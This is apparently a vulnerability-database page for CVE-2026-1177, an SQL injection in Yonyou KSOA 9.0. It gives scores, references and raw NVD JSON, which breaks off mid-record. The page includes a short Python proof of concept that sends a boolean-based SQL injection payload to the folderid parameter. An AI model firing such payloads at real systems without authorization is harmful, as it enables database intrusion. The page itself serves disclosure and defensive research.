CVE-2026-1177

Description

A weakness has been identified in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /kmf/save_folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:* - VULNERABLE

Yonyou KSOA 9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-1177 PoC - Yonyou KSOA 9.0 SQL Injection
Target: /kmf/save_folder.jsp
Parameter: folderid
"""
import requests
import sys

def test_sql_injection(target_url):
    """Test for SQL injection vulnerability in folderid parameter"""
    # Normal request
    normal_params = {'folderid': '1'}
    try:
        resp_normal = requests.get(f'{target_url}/kmf/save_folder.jsp', params=normal_params, timeout=10)
        print(f'[+] Normal request status: {resp_normal.status_code}')
    except requests.RequestException as e:
        print(f'[-] Normal request failed: {e}')
    
    # SQL injection test - Boolean based
    sqli_payload = "1' AND 1=1--"
    sqli_params = {'folderid': sqli_payload}
    try:
        resp_sqli = requests.get(f'{target_url}/kmf/save_folder.jsp', params=sqli_params, timeout=10)
        print(f'[+] SQLi test status: {resp_sqli.status_code}')
        if resp_sqli.status_code == 200:
            print('[+] Target may be vulnerable to SQL injection')
    except requests.RequestException as e:
        print(f'[-] SQLi test failed: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python3 {sys.argv[0]} <target_url>')
        print(f'Example: python3 {sys.argv[0]} http://target.com')
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    test_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1177
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1177
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1177/
[4] VulDB https://vuldb.com/cve/CVE-2026-1177
[5] https://github.com/LX-66-LX/cve/issues/17
[6] https://vuldb.com/?ctiid.341771
[7] https://vuldb.com/?id.341771
[8] https://vuldb.com/?submit.734577

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1177", "sourceIdentifier": "[email protected]", "published": "2026-01-19T22:16:02.080", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /kmf/save_folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una debilidad ha sido identificada en Yonyou KSOA 9.0. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo /kmf/save_folder.jsp del componente HTTP GET Parameter Handler. La ejecución de una manipulación del argumento folderid puede llevar a inyección SQL. Es posible lanzar el ataque remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "16092315-0438-4B91-A293-8CE177EAD656"}]}]}], "references": [{"url": "https://github.com/LX-66-LX/cve/issues/17", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://vuldb.com/?ctiid.341771", "source": "[email protected]", "tags": ["Permissions Requi ... (truncated)